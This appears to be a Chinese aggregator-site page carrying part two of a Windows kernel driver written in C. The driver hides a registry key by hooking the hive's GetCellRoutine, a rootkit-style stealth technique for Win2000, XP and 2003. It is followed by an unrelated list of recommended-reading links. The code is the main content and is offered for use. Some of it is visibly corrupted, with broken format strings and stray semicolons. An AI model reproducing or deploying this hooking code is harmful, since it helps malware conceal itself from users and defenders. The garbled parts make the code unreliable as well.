一段隐藏注册表项的代码( 二 ) _云知道

}
else
{
// 一般叶索引，返回最后的节点
return g_pGetCellRoutine(Hive, Index->List[Index->Count-1]);
}
}
// GetCell例程的钩子函数
PVOID MyGetCellRoutine(PVOID Hive, HANDLE Cell)
{
// 调用原函数
PVOID pRet = g_pGetCellRoutine(Hive, Cell);
if (pRet)
{
// 返回的是需要隐藏的节点
if (pRet == g_HideNode)
{
DbgPrint("GetCellRoutine(%lx, lx) = %lxn", Hive, Cell, pRet);
// 查询、保存并返回其父键的最后一个子键的节点
pRet = g_LastNode = (PCM_KEY_NODE)GetLastKeyNode(Hive, g_HideNode);
DbgPrint("g_LastNode = %lxn", g_LastNode);
// 隐藏的正是最后一个节点，返回空值
if (pRet == g_HideNode) pRet = NULL;
}
// 返回的是先前保存的最后一个节点
else if (pRet == g_LastNode)
{
DbgPrint("GetCellRoutine(%lx, lx) = %lxn", Hive, Cell, pRet);
// 清空保存值，并返回空值
pRet = g_LastNode = NULL;
}
}
return pRet;
}
NTSTATUS DriverUnload(PDRIVER_OBJECT pDrvObj)
{
DbgPrint("DriverUnload()n");
// 解除挂钩
if (g_ppGetCellRoutine) *g_ppGetCellRoutine = g_pGetCellRoutine;
return STATUS_SUCCESS;
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDrvObj, PUNICODE_STRING pRegPath)
{
ULONG BuildNumber;
ULONG KeyHiveOffset;;;;;// KeyControlBlock->KeyHive
ULONG KeyCellOffset;;;;;// KeyControlBlock->KeyCell
HANDLE hKey;
PVOID KCB, Hive;
DbgPrint("DriverEntry()n");
pDrvObj->DriverUnload = DriverUnload;
// 查询BuildNumber
if (PsGetVersion(NULL, NULL, &BuildNumber, NULL)) return STATUS_NOT_SUPPORTED;
DbgPrint("BuildNumber = %dn", BuildNumber);
// KeyControlBlock结构各版本略有不同
// Cell的值一般小于0x80000000 ，而Hive正相反，以此来判断也可以
switch (BuildNumber)
{
case 2195:;;// Win2000
KeyHiveOffset = 0xc;
KeyCellOffset = 0x10;
break;
case 2600:;;// WinXP
case 3790:;;// Win2003
KeyHiveOffset = 0x10;
KeyCellOffset = 0x14;
break;
default:
return STATUS_NOT_SUPPORTED;
}
// 打开需隐藏的键
hKey = OpenKeyByName(g_HideKeyName);
// 获取该键的KeyControlBlock
KCB = GetKeyControlBlock(hKey);
if (KCB)
{
// 由KCB得到Hive
PHHIVE Hive = (PHHIVE)GET_PTR(KCB, KeyHive);
// GetCellRoutine在KCB中，保存原地址
g_ppGetCellRoutine = &Hive->GetCellRoutine;
g_pGetCellRoutine = Hive->GetCellRoutine;
DbgPrint("GetCellRoutine = %lxn", g_pGetCellRoutine);
// 获取需隐藏的节点并保存
g_HideNode = (PCM_KEY_NODE)g_pGetCellRoutine(Hive, GET_PTR(KCB, KeyCell));
// 挂钩GetCell例程
Hive->GetCellRoutine = MyGetCellRoutine;
}
ZwClose(hKey);
return STATUS_SUCCESS;
}

一段隐藏注册表项的代码( 二 )

推荐阅读

兔不可复得兔不可复得的意思是什么

温州老城西南片

Win XP安装程序时出现系统错误解决

柯基犬牵引绳胸背使用方法

地砖油渍怎么去除方法，地砖油渍怎么去除方法图解

足球越位是什么意思足球越位的含义

翡翠买什么样式的好处，翡翠买哪种品质的好

一加5T手机怎么开通公交卡？

知乎闪退怎么回事

广州增城区宁西街九价HPV疫苗接种要核酸阴性证明吗？

小编教你bilibili头像佩戴挂件的详细方法介绍小编教你键盘失灵按什么键恢复

full steam什么意思 steam什么意思

云台山注册多少元，焦作云台山的门票多少

厨房水槽款式有哪些

怎样分辨真假红枸杞红枸杞有什么功效作用

水果货架怎么摆法,如何给水果保鲜